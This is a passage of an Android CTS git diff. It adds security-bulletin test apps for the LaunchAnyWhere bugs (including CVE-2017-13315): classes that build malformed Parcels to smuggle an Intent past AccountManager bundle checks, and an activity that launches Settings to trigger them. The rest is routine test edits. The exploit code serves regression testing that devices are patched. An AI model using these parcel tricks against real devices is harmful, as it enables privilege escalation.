+ int bundleStartPos = data.dataPosition();
+ data.writeInt(3);
+
+ try {
+ Class clazz = Class.forName("android.media.MediaCas$ParcelableCasData");
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+
+ data.writeString("xjoa8h2");
+ data.writeInt(4);
+ data.writeString("android.media.MediaCas$ParcelableCasData");
+
+ data.writeInt(13);
+ data.writeInt(32);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+
+ data.writeInt(13);
+ int byteArrayLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ int byteArrayStartPos = data.dataPosition();
+ data.writeString(AccountManager.KEY_INTENT);
+ data.writeInt(4);
+ data.writeString("android.content.Intent");
+ intent.writeToParcel(data, 0);
+ int byteArrayEndPos = data.dataPosition();
+ data.setDataPosition(byteArrayLenPos);
+ int byteArrayLen = byteArrayEndPos - byteArrayStartPos;
+ data.writeInt(byteArrayLen);
+ data.setDataPosition(byteArrayEndPos);
+
+ int bundleEndPos = data.dataPosition();
+ data.setDataPosition(bundleLenPos);
+ int bundleLen = bundleEndPos - bundleStartPos;
+ data.writeInt(bundleLen);
+ data.setDataPosition(bundleEndPos);
+
+ return data;
+ }
+}
+
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13315.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13315.java
new file mode 100644
index 0000000..dc15e7e
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13315.java
@@ -0,0 +1,69 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.os.Parcel;
+
+public class CVE_2017_13315 implements IGenerateMalformedParcel {
+ public Parcel generate(Intent intent) {
+ Parcel data = Parcel.obtain();
+ data.writeInterfaceToken("android.accounts.IAccountAuthenticatorResponse");
+ data.writeInt(1);
+ int bundleLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ data.writeInt(0x4C444E42);
+ int bundleStartPos = data.dataPosition();
+ data.writeInt(3);
+
+ data.writeString("launchanywhere");
+ data.writeInt(4);
+ data.writeString("com.android.internal.telephony.DcParamObject");
+ data.writeInt(0);
+
+ data.writeInt(0);
+ data.writeInt(6);
+ data.writeInt(13);
+ int byteArrayLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ int byteArrayStartPos = data.dataPosition();
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeString(AccountManager.KEY_INTENT);
+ data.writeInt(4);
+ data.writeString("android.content.Intent");
+ intent.writeToParcel(data, 0);
+ int byteArrayEndPos = data.dataPosition();
+ data.setDataPosition(byteArrayLenPos);
+ int byteArrayLen = byteArrayEndPos - byteArrayStartPos;
+ data.writeInt(byteArrayLen);
+ data.setDataPosition(byteArrayEndPos);
+
+ int bundleEndPos = data.dataPosition();
+ data.setDataPosition(bundleLenPos);
+ int bundleLen = bundleEndPos - bundleStartPos;
+ data.writeInt(bundleLen);
+ data.setDataPosition(bundleEndPos);
+
+ return data;
+ }
+}
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/IGenerateMalformedParcel.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/IGenerateMalformedParcel.java
new file mode 100644
index 0000000..bb473ab
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/IGenerateMalformedParcel.java
@@ -0,0 +1,22 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.content.Intent;
+import android.os.Parcel;
+
+public interface IGenerateMalformedParcel { Parcel generate(Intent i); }
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/StartExploit.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/StartExploit.java
new file mode 100644
index 0000000..2d439da
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/StartExploit.java
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.app.Activity;
+import android.content.ComponentName;
+import android.content.Intent;
+import android.os.Bundle;
+import android.util.Log;
+
+public class StartExploit extends Activity {
+ protected static final String TAG = "LaunchAnyWhere";
+
+ @Override
+ public void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+
+ String exploitName = "com.android.security.cts.launchanywhere." +
+ getIntent().getStringExtra("cve");
+
+ String classAccessMessage = "Please ensure that the class is part of "
+ + "the com.android.security.cts.launchanywhere package";
+
+ try {
+ Authenticator.exploit =
+ (IGenerateMalformedParcel) Class.forName(exploitName)
+ .newInstance();
+ } catch (ClassNotFoundException e) {
+ Log.e(TAG, "Unable to load the class " + exploitName + "! " +
+ classAccessMessage);
+ e.printStackTrace();
+ return;
+ } catch (InstantiationException e) {
+ Log.e(TAG, "Unable to instantiate the exploit! " + exploitName);
+ e.printStackTrace();
+ return;
+ } catch (IllegalAccessException e) {
+ Log.e(TAG,
+ "Unable to access class " + exploitName + "! " +
+ classAccessMessage + " and is not private");
+ e.printStackTrace();
+ return;
+ }
+
+ Intent attacker = new Intent();
+ attacker.setComponent(new ComponentName(
+ "com.android.settings",
+ "com.android.settings.accounts.AddAccountSettings"));
+ attacker.setAction(Intent.ACTION_RUN);
+ attacker.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ String authTypes[] = {"com.launchanywhere"};
+ attacker.putExtra("account_types", authTypes);
+ startActivity(attacker);
+ }
+}
\ No newline at end of file
diff --git a/tests/JobScheduler/src/android/jobscheduler/cts/BatteryConstraintTest.java b/tests/JobScheduler/src/android/jobscheduler/cts/BatteryConstraintTest.java
index dd855da..f8a4228b 100644
--- a/tests/JobScheduler/src/android/jobscheduler/cts/BatteryConstraintTest.java
+++ b/tests/JobScheduler/src/android/jobscheduler/cts/BatteryConstraintTest.java
@@ -32,7 +32,6 @@
import android.os.SystemClock;
import android.provider.Settings;
import android.util.Log;
-import android.content.res.Resources;
import com.android.compatibility.common.util.SystemUtil;
@@ -50,7 +49,6 @@
public static final int BATTERY_JOB_ID = BatteryConstraintTest.class.hashCode();
private JobInfo.Builder mBuilder;
- private int mLowBatteryWarningLevel = 15;
/**
* Record of the previous state of power save mode trigger level to reset it after the test
* finishes.
@@ -61,9 +59,6 @@
public void setUp() throws Exception {
super.setUp();
- mLowBatteryWarningLevel = Resources.getSystem().getInteger(
- Resources.getSystem().getIdentifier(
- "config_lowBatteryWarningLevel", "integer", "android"));
// Disable power save mode as some devices may turn off Android when power save mode is
// enabled, causing the test to fail.
mPreviousLowPowerTriggerLevel = Settings.Global.getInt(getContext().getContentResolver(),
@@ -273,7 +268,7 @@
* the battery level is critical and not on power.
*/
public void testBatteryNotLowConstraintFails_withoutPower() throws Exception {
- setBatteryState(false, mLowBatteryWarningLevel);
+ setBatteryState(false, 5);
// setBatteryState() waited for the charging/not-charging state to formally settle,
// but battery level reporting lags behind that. wait a moment to let that happen
// before proceeding.
@@ -308,8 +303,8 @@
kTestEnvironment.awaitExecution());
// And check that the job is stopped if battery goes low again.
- setBatteryState(false, mLowBatteryWarningLevel);
- setBatteryState(false, mLowBatteryWarningLevel - 1);
+ setBatteryState(false, 5);
+ setBatteryState(false, 4);
waitFor(2_000);
verifyChargingState(false);
verifyBatteryNotLowState(false);
diff --git a/tests/ProcessTest/src/com/android/cts/process/ProcessTest.java b/tests/ProcessTest/src/com/android/cts/process/ProcessTest.java
index 8faee83..a64a900 100644
--- a/tests/ProcessTest/src/com/android/cts/process/ProcessTest.java
+++ b/tests/ProcessTest/src/com/android/cts/process/ProcessTest.java
@@ -25,8 +25,6 @@
import android.content.pm.PackageManager;
import android.test.AndroidTestCase;
-import com.android.compatibility.common.util.CddTest;
-
import com.android.cts.process.activity.NoSharePidActivity;
import com.android.cts.process.activity.SharePidActivity;
import com.android.cts.process.activity.SharePidSubActivity;
@@ -34,7 +32,6 @@
public class ProcessTest extends AndroidTestCase {
private final int WAIT_TIME = 2000;
- @CddTest(requirement="9.2/C-0-1")
public void testUid() throws Exception {
String enableApp = "com.android.cts.process.shareuidapp";
String disableApp = "com.android.cts.process.noshareuidapp";
@@ -49,7 +46,6 @@
assertNotSame(uid2, uid3);
}
- @CddTest(requirement="9.2/C-0-1")
public void testPid() throws Exception {
ActivityManager am = (ActivityManager) mContext.getSystemService(Context.ACTIVITY_SERVICE);
String shareProcessName = mContext.getPackageName() + ":shareProcess";
diff --git a/tests/accessibilityservice/AndroidManifest.xml b/tests/accessibilityservice/AndroidManifest.xml
index 029dc51..5214410 100644
--- a/tests/accessibilityservice/AndroidManifest.xml
+++ b/tests/accessibilityservice/AndroidManifest.xml
@@ -30,38 +30,38 @@
<activity
android:label="@string/accessibility_end_to_end_test_activity"
android:name=".activities.AccessibilityEndToEndActivity"
- android:screenOrientation="locked"/>
+ android:screenOrientation="portrait"/>
<activity
android:label="@string/accessibility_query_window_test_activity"
android:name=".activities.AccessibilityWindowQueryActivity"
android:supportsPictureInPicture="true"
- android:screenOrientation="locked"/>
+ android:screenOrientation="portrait"/>
<activity
android:label="@string/accessibility_view_tree_reporting_test_activity"
android:name=".activities.AccessibilityViewTreeReportingActivity"
- android:screenOrientation="locked"/>
+ android:screenOrientation="portrait"/>
<activity
android:label="@string/accessibility_focus_and_input_focus_sync_test_activity"
android:name=".activities.AccessibilityFocusAndInputFocusSyncActivity"
- android:screenOrientation="locked"/>
+ android:screenOrientation="portrait"/>
<activity
android:label="@string/accessibility_text_traversal_test_activity"
android:name=".activities.AccessibilityTextTraversalActivity"
- android:screenOrientation="locked"/>
+ android:screenOrientation="portrait"/>
<activity android:label="Activity for testing window accessibility reporting"
android:name=".activities.AccessibilityWindowReportingActivity"
android:supportsPictureInPicture="true"
- android:screenOrientation="locked"/>
+ android:screenOrientation="portrait"/>
<activity
android:label="Full screen activity for gesture dispatch testing"
android:name=".AccessibilityGestureDispatchTest$GestureDispatchActivity"
- android:screenOrientation="locked" />
+ android:screenOrientation="portrait" />
<activity
android:label="@string/accessibility_soft_keyboard_modes_activity"
diff --git a/tests/accessibilityservice/src/android/accessibilityservice/cts/AccessibilityVolumeTest.java b/tests/accessibilityservice/src/android/accessibilityservice/cts/AccessibilityVolumeTest.java
index b59b3eb..9983699 100644
--- a/tests/accessibilityservice/src/android/accessibilityservice/cts/AccessibilityVolumeTest.java
+++ b/tests/accessibilityservice/src/android/accessibilityservice/cts/AccessibilityVolumeTest.java
@@ -71,8 +71,7 @@
return;
}
final int startingVolume = mAudioManager.getStreamVolume(AudioManager.STREAM_ACCESSIBILITY);
- final int minVolume = mAudioManager.getStreamMinVolume(AudioManager.STREAM_ACCESSIBILITY);
- final int otherVolume = (startingVolume == minVolume) ? (minVolume + 1) : startingVolume - 1;
+ final int otherVolume = (startingVolume == 0) ? 1 : startingVolume - 1;
final InstrumentedAccessibilityService service = InstrumentedAccessibilityService
.enableService(mInstrumentation, InstrumentedAccessibilityService.class);
try {
diff --git a/tests/app/src/android/app/cts/WallpaperManagerTest.java b/tests/app/src/android/app/cts/WallpaperManagerTest.java
index dfb4714..139e7c12 100644
--- a/tests/app/src/android/app/cts/WallpaperManagerTest.java
+++ b/tests/app/src/android/app/cts/WallpaperManagerTest.java
@@ -45,8 +45,6 @@
import android.view.Display;
import android.view.WindowManager;
-import com.android.compatibility.common.util.CddTest;
-
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
@@ -102,52 +100,6 @@
}
@Test
- public void setBitmapTest_1x1Pixel() {
- ensureCleanState();
-
- Bitmap tmpWallpaper = Bitmap.createBitmap(1, 1, Bitmap.Config.ARGB_8888);
- Canvas canvas = new Canvas(tmpWallpaper);
- canvas.drawColor(Color.RED);
-
- try {
- int which = WallpaperManager.FLAG_SYSTEM;
- int oldWallpaperId = mWallpaperManager.getWallpaperId(which);
- mWallpaperManager.suggestDesiredDimensions(tmpWallpaper.getWidth(),
- tmpWallpaper.getHeight());
- mWallpaperManager.setBitmap(tmpWallpaper);
- int newWallpaperId = mWallpaperManager.getWallpaperId(which);
- Assert.assertNotEquals(oldWallpaperId, newWallpaperId);
- } catch (IOException e) {
- throw new RuntimeException(e);
- } finally {
- tmpWallpaper.recycle();
- }
- }
-
- @Test
- public void setBitmapTest_1x1Pixel_FullscreenDesired() {
- ensureCleanState();
-
- Bitmap tmpWallpaper = Bitmap.createBitmap(1, 1, Bitmap.Config.ARGB_8888);
- Canvas canvas = new Canvas(tmpWallpaper);
- canvas.drawColor(Color.RED);
-
- try {
- int which = WallpaperManager.FLAG_SYSTEM;
- int oldWallpaperId = mWallpaperManager.getWallpaperId(which);
- final Point displaySize = getScreenSize();
- mWallpaperManager.suggestDesiredDimensions(displaySize.x, displaySize.y);
- mWallpaperManager.setBitmap(tmpWallpaper);
- int newWallpaperId = mWallpaperManager.getWallpaperId(which);
- Assert.assertNotEquals(oldWallpaperId, newWallpaperId);
- } catch (IOException e) {
- throw new RuntimeException(e);
- } finally {
- tmpWallpaper.recycle();
- }
- }
-
- @Test
public void setResourceTest() {
try {
int which = WallpaperManager.FLAG_SYSTEM;
@@ -160,7 +112,6 @@
}
}
- @CddTest(requirement="3.2.3.4/C-0-1")
@Test
public void wallpaperChangedBroadcastTest() {
Bitmap tmpWallpaper = Bitmap.createBitmap(100, 100, Bitmap.Config.ARGB_8888);
diff --git a/tests/autofillservice/src/android/autofillservice/cts/OutOfProcessLoginActivity.java b/tests/autofillservice/src/android/autofillservice/cts/OutOfProcessLoginActivity.java
index ff955dd..6f6b75a 100644
--- a/tests/autofillservice/src/android/autofillservice/cts/OutOfProcessLoginActivity.java
+++ b/tests/autofillservice/src/android/autofillservice/cts/OutOfProcessLoginActivity.java
@@ -89,7 +89,6 @@
Log.e(TAG, "could write destroyed marker: " + e);
}
super.onDestroy();
- sInstance = null;
}
/**
@@ -128,8 +127,4 @@
sInstance.finish();
}
}
-
- public static boolean hasInstance() {
- return sInstance != null;
- }
}
diff --git a/tests/autofillservice/src/android/autofillservice/cts/SessionLifecycleTest.java b/tests/autofillservice/src/android/autofillservice/cts/SessionLifecycleTest.java
index 18ef5aa..039dc22 100644
--- a/tests/autofillservice/src/android/autofillservice/cts/SessionLifecycleTest.java
+++ b/tests/autofillservice/src/android/autofillservice/cts/SessionLifecycleTest.java
@@ -47,7 +47,6 @@
import android.os.SystemClock;
import android.platform.test.annotations.AppModeFull;
import android.support.test.uiautomator.UiObject2;
-import android.util.Log;
import android.view.autofill.AutofillValue;
import org.junit.After;
@@ -61,8 +60,6 @@
*/
@AppModeFull // This test requires android.permission.WRITE_EXTERNAL_STORAGE
public class SessionLifecycleTest extends AutoFillServiceTestCase {
- private static final String TAG = "SessionLifecycleTest";
-
private static final String ID_BUTTON = "button";
private static final String ID_CANCEL = "cancel";
@@ -109,10 +106,6 @@
+ "-n android.autofillservice.cts/.OutOfProcessLoginActivityFinisherReceiver");
mUiBot.assertGoneByRelativeId(ID_USERNAME, Timeouts.ACTIVITY_RESURRECTION);
- if (!OutOfProcessLoginActivity.hasInstance()) {
- Log.v(TAG, "@After: Not waiting for oop activity to be destroyed");
- return;
- }
// Waiting for activity to be destroyed (destroy marker appears)
eventually("getDestroyedMarker()", () -> {
return getDestroyedMarker(getContext()).exists();
diff --git a/tests/backup/AndroidTest.xml b/tests/backup/AndroidTest.xml
index 9b6ab65..8e0bfa0 100644
--- a/tests/backup/AndroidTest.xml
+++ b/tests/backup/AndroidTest.xml
@@ -17,11 +17,6 @@
<configuration description="Config for CTS Backup test cases">
<option name="test-suite-tag" value="cts" />
<option name="config-descriptor:metadata" key="component" value="backup" />
-
- <target_preparer class="com.android.tradefed.targetprep.SwitchUserTargetPreparer">
- <option name="user-type" value="system" />
- </target_preparer>
-
<target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
<option name="cleanup-apks" value="true" />
<option name="test-file-name" value="CtsFullBackupApp.apk" />
diff --git a/tests/camera/AndroidTest.xml b/tests/camera/AndroidTest.xml
index b2b6695..2a2cdc9 100644
--- a/tests/camera/AndroidTest.xml
+++ b/tests/camera/AndroidTest.xml
@@ -23,7 +23,7 @@
<test class="com.android.tradefed.testtype.AndroidJUnitTest" >
<option name="package" value="android.camera.cts" />
<option name="runtime-hint" value="12m7s" />
- <!-- test-timeout unit is ms, value = 300 min -->
- <option name="test-timeout" value="18000000" />
+ <!-- test-timeout unit is ms, value = 200 min -->
+ <option name="test-timeout" value="12000000" />
</test>
</configuration>
diff --git a/tests/framework/base/activitymanager/src/android/server/am/ActivityManagerActivityVisibilityTests.java b/tests/framework/base/activitymanager/src/android/server/am/ActivityManagerActivityVisibilityTests.java
index 1adc553..09eae84 100644
--- a/tests/framework/base/activitymanager/src/android/server/am/ActivityManagerActivityVisibilityTests.java
+++ b/tests/framework/base/activitymanager/src/android/server/am/ActivityManagerActivityVisibilityTests.java
@@ -239,8 +239,6 @@
// Launch a different activity on top.
launchActivity(BROADCAST_RECEIVER_ACTIVITY);
mAmWmState.waitForActivityState(BROADCAST_RECEIVER_ACTIVITY, STATE_RESUMED);
- // Wait for transition complete.
- mAmWmState.waitForValidState(MOVE_TASK_TO_BACK_ACTIVITY);
final boolean shouldBeVisible =
!mAmWmState.getAmState().isBehindOpaqueActivities(MOVE_TASK_TO_BACK_ACTIVITY);
mAmWmState.assertVisibility(MOVE_TASK_TO_BACK_ACTIVITY, shouldBeVisible);
diff --git a/tests/framework/base/activitymanager/src/android/server/am/ActivityManagerPinnedStackTests.java b/tests/framework/base/activitymanager/src/android/server/am/ActivityManagerPinnedStackTests.java
index af15187..f51f6fd 100644
--- a/tests/framework/base/activitymanager/src/android/server/am/ActivityManagerPinnedStackTests.java
+++ b/tests/framework/base/activitymanager/src/android/server/am/ActivityManagerPinnedStackTests.java
@@ -633,14 +633,17 @@
launchActivity(TEST_ACTIVITY);
// Launch an auto pip activity
- launchActivity(PIP_ACTIVITY, EXTRA_ENTER_PIP, "true");
+ launchActivity(PIP_ACTIVITY,
+ EXTRA_ENTER_PIP, "true",
+ EXTRA_REENTER_PIP_ON_EXIT, "true");
waitForEnterPip(PIP_ACTIVITY);
assertPinnedStackExists();
// Relaunch the activity to fullscreen to trigger the activity to exit and re-enter pip
launchActivity(PIP_ACTIVITY);
- waitForExitPipToFullscreen(PIP_ACTIVITY);
- executeShellCommand("am broadcast -a " + ACTION_ENTER_PIP);
+ mAmWmState.waitForWithAmState(amState ->
+ amState.getFrontStackWindowingMode(DEFAULT_DISPLAY) == WINDOWING_MODE_FULLSCREEN,
+ "Waiting for PIP to exit to fullscreen");
waitForEnterPipAnimationComplete(PIP_ACTIVITY);
mAmWmState.assertVisibility(TEST_ACTIVITY, true);
}
diff --git a/tests/framework/base/activitymanager/src/android/server/am/KeyguardLockedTests.java b/tests/framework/base/activitymanager/src/android/server/am/KeyguardLockedTests.java
index 0a99cc5..5d2d82b 100644
--- a/tests/framework/base/activitymanager/src/android/server/am/KeyguardLockedTests.java
+++ b/tests/framework/base/activitymanager/src/android/server/am/KeyguardLockedTests.java
@@ -170,11 +170,7 @@
lockScreenSession.setLockCredential().sleepDevice();
mAmWmState.computeState(true);
- if (!isWatch()) {
- // On P watches, keyguard windows are only shown while in interactive to allow
- // SysUI implementation to show in ambient mode.
- assertTrue(mAmWmState.getAmState().getKeyguardControllerState().keyguardShowing);
- }
+ assertTrue(mAmWmState.getAmState().getKeyguardControllerState().keyguardShowing);
launchActivity(TURN_SCREEN_ON_ATTR_DISMISS_KEYGUARD_ACTIVITY);
mAmWmState.waitForKeyguardShowingAndNotOccluded();
mAmWmState.assertVisibility(TURN_SCREEN_ON_ATTR_DISMISS_KEYGUARD_ACTIVITY, false);
diff --git a/tests/framework/base/activitymanager/src/android/server/am/VirtualDisplayHelper.java b/tests/framework/base/activitymanager/src/android/server/am/VirtualDisplayHelper.java
index 6cdd925..11035ce 100644
--- a/tests/framework/base/activitymanager/src/android/server/am/VirtualDisplayHelper.java
+++ b/tests/framework/base/activitymanager/src/android/server/am/VirtualDisplayHelper.java
@@ -29,7 +29,6 @@
import android.hardware.display.VirtualDisplay;
import android.media.ImageReader;
import android.os.SystemClock;
-import android.view.Display;
import androidx.annotation.Nullable;
import com.android.compatibility.common.util.SystemUtil;
@@ -51,8 +50,6 @@
private static final Pattern DISPLAY_DEVICE_PATTERN = Pattern.compile(
".*DisplayDeviceInfo\\{\"([^\"]+)\":.*, state (\\S+),.*\\}.*");
- private static final Pattern DEFAULT_DISPLAY_PATTERN = Pattern.compile(
- "(mDisplayId=" + Display.DEFAULT_DISPLAY + ")([\\s\\S]*?)(mPrimaryDisplayDevice=)(.*)");
private static final int DENSITY = 160;
private static final int HEIGHT = 480;
private static final int WIDTH = 800;
@@ -125,20 +122,9 @@
@Nullable
private static Boolean getDisplayState(boolean defaultDisplay) {
final String dump = executeShellCommand("dumpsys display");
- String defaultDisplayName = null;
- // Finds the corresponding physical display among current multiple default logical displays
- // and read the proper display state.
- if (defaultDisplay) {
- final Matcher matcher = DEFAULT_DISPLAY_PATTERN.matcher(dump);
- if (matcher.find()) {
- defaultDisplayName = matcher.group(4);
- }
- if (defaultDisplayName == null) {
- return null;
- }
- }
- final String displayName = defaultDisplay ? defaultDisplayName : VIRTUAL_DISPLAY_NAME;
- final Predicate<Matcher> displayNameMatcher = m -> m.group(1).equals(displayName);
+ final Predicate<Matcher> displayNameMatcher = defaultDisplay
+ ? m -> m.group(0).contains("FLAG_DEFAULT_DISPLAY")
+ : m -> m.group(1).equals(VIRTUAL_DISPLAY_NAME);
for (final String line : dump.split("\\n")) {
final Matcher matcher = DISPLAY_DEVICE_PATTERN.matcher(line);
if (matcher.matches() && displayNameMatcher.test(matcher)) {
diff --git a/tests/framework/base/windowmanager/src/android/server/wm/CrossAppDragAndDropTests.java b/tests/framework/base/windowmanager/src/android/server/wm/CrossAppDragAndDropTests.java
index eee7778..5d26234 100644
--- a/tests/framework/base/windowmanager/src/android/server/wm/CrossAppDragAndDropTests.java
+++ b/tests/framework/base/windowmanager/src/android/server/wm/CrossAppDragAndDropTests.java
@@ -36,14 +36,12 @@
import android.app.ActivityManager;
import android.content.Context;
import android.graphics.Point;
-import android.hardware.display.DisplayManager;
import android.os.RemoteException;
import android.platform.test.annotations.AppModeFull;
import android.os.SystemClock;
import android.platform.test.annotations.Presubmit;
import android.support.test.InstrumentationRegistry;
import android.util.Log;
-import android.view.Display;
import org.junit.After;
import org.junit.Before;
@@ -122,7 +120,6 @@
protected Context mContext;
protected ActivityManager mAm;
- protected DisplayManager mDm;
private Map<String, String> mSourceResults;
private Map<String, String> mTargetResults;
@@ -145,7 +142,6 @@
mContext = InstrumentationRegistry.getContext();
mAm = mContext.getSystemService(ActivityManager.class);
- mDm = mContext.getSystemService(DisplayManager.class);
mSourcePackageName = SOURCE_PACKAGE_NAME;
mTargetPackageName = TARGET_PACKAGE_NAME;
@@ -311,9 +307,9 @@
}
private Point getDisplaySize() throws Exception {
- final Point displaySize = new Point();
- mDm.getDisplay(Display.DEFAULT_DISPLAY).getRealSize(displaySize);
- return displaySize;
+ final String output = executeShellCommand("wm size");
+ final String[] sizes = output.split(" ")[2].split("x");
+ return new Point(Integer.valueOf(sizes[0].trim()), Integer.valueOf(sizes[1].trim()));
}
private Point getWindowCenter(String name) throws Exception {
diff --git a/tests/sensor/src/android/hardware/cts/SensorSupportTest.java b/tests/sensor/src/android/hardware/cts/SensorSupportTest.java
old mode 100755
new mode 100644
index 63cda8b..35d48df
--- a/tests/sensor/src/android/hardware/cts/SensorSupportTest.java
+++ b/tests/sensor/src/android/hardware/cts/SensorSupportTest.java
@@ -25,7 +25,6 @@
import android.os.Build;
import com.android.compatibility.common.util.PropertyUtil;
-import com.android.compatibility.common.util.CddTest;
/**
* Checks if Hifi sensors or VR High performance mode sensors
@@ -60,34 +59,29 @@
}
}
- @CddTest(requirement="7.9.2/C-1-19,C-1-20")
public void testSupportsAccelerometer() {
checkSupportsSensor(Sensor.TYPE_ACCELEROMETER);
}
- @CddTest(requirement="7.9.2/C-1-19,C-1-20")
- public void testSupportsAccelerometerUncalibrated() {
+ public void testSupportsAccelerometerUncalibrated() {
+ // Uncalibrated accelerometer was not required before Android O
if (PropertyUtil.getFirstApiLevel() >= Build.VERSION_CODES.O) {
checkSupportsSensor(Sensor.TYPE_ACCELEROMETER_UNCALIBRATED);
}
}
- @CddTest(requirement="7.9.2/C-1-19,C-1-20")
public void testSupportsGyroscope() {
checkSupportsSensor(Sensor.TYPE_GYROSCOPE);
}
- @CddTest(requirement="7.9.2/C-1-19,C-1-20")
public void testSupportsGyroscopeUncalibrated() {
checkSupportsSensor(Sensor.TYPE_GYROSCOPE_UNCALIBRATED);
}
- @CddTest(requirement="7.9.2/C-1-19,C-1-20")
public void testSupportsGeoMagneticField() {
checkSupportsSensor(Sensor.TYPE_MAGNETIC_FIELD);
}
- @CddTest(requirement="7.9.2/C-1-19,C-1-20")
public void testSupportsMagneticFieldUncalibrated() {
checkSupportsSensor(Sensor.TYPE_MAGNETIC_FIELD_UNCALIBRATED);
}
diff --git a/tests/signature/intent-check/DynamicConfig.xml b/tests/signature/intent-check/DynamicConfig.xml
index 10b4834..6c7aace 100644
--- a/tests/signature/intent-check/DynamicConfig.xml
+++ b/tests/signature/intent-check/DynamicConfig.xml
@@ -23,13 +23,6 @@
Bug: 78574873 android.intent.action.INSTALL_EPHEMERAL_PACKAGE
Bug: 78574873 android.intent.action.RESOLVE_EPHEMERAL_PACKAGE
Bug: 78574873 android.intent.action.EPHEMERAL_RESOLVER_SETTINGS
- Bug: 115799975 android.intent.action.ACTION_AIRPLANE_MODE_CHANGED
- Will be removed after v17 of CS.apk is released.
- Bug: 117590943 android.intent.action.View
- Fixed in GMSCore v14.7.68.
- Bug: 67109014 android.intent.action.BADGE_COUNT_UPDATE // Samsung is sending
- //new corrected intent and the old intent in P.
- //Target date for fix is under disucssion for BADGE_COUNT_UPDATE
-->
<dynamicConfig>
<entry key ="intent_whitelist">
@@ -41,8 +34,5 @@
<value>android.intent.action.INSTALL_EPHEMERAL_PACKAGE</value>
<value>android.intent.action.RESOLVE_EPHEMERAL_PACKAGE</value>
<value>android.intent.action.EPHEMERAL_RESOLVER_SETTINGS</value>
- <value>android.intent.action.ACTION_AIRPLANE_MODE_CHANGED</value>
- <value>android.intent.action.View</value>
- <value>android.intent.action.BADGE_COUNT_UPDATE</value>
</entry>
</dynamicConfig>
diff --git a/tests/tests/background/src/android/app/cts/backgroundrestrictions/BroadcastsTest.java b/tests/tests/background/src/android/app/cts/backgroundrestrictions/BroadcastsTest.java
index 5c43d4d..a8320ff 100644
--- a/tests/tests/background/src/android/app/cts/backgroundrestrictions/BroadcastsTest.java
+++ b/tests/tests/background/src/android/app/cts/backgroundrestrictions/BroadcastsTest.java
@@ -57,7 +57,7 @@
* receiver.
*/
@Test
- @CddTest(requirement="3.5/C-0-6,3.2.3.4/C-0-1")
+ @CddTest(requirement="3.5/C-0-6")
public void testNonSupportedBroadcastsNotDelivered_runtimeReceiver() throws Exception {
// Need a reference here to initialize it in a lambda.
@@ -85,7 +85,7 @@
*/
@AppModeFull(reason = "Instant apps don't get to run in the background.")
@Test
- @CddTest(requirement="3.5/C-0-6,3.2.3.4/C-0-1")
+ @CddTest(requirement="3.5/C-0-6")
public void testNonSupportedBroadcastsNotDelivered_manifestReceiver() throws Exception {
// Need a reference here to initialize it in a lambda.
final AtomicReference<BroadcastReceiver> receiverRef = new AtomicReference<>();
diff --git a/tests/tests/batterysaving/src/android/os/cts/batterysaving/BatterySavingTestBase.java b/tests/tests/batterysaving/src/android/os/cts/batterysaving/BatterySavingTestBase.java
index 9122406..4aef998 100644
--- a/tests/tests/batterysaving/src/android/os/cts/batterysaving/BatterySavingTestBase.java
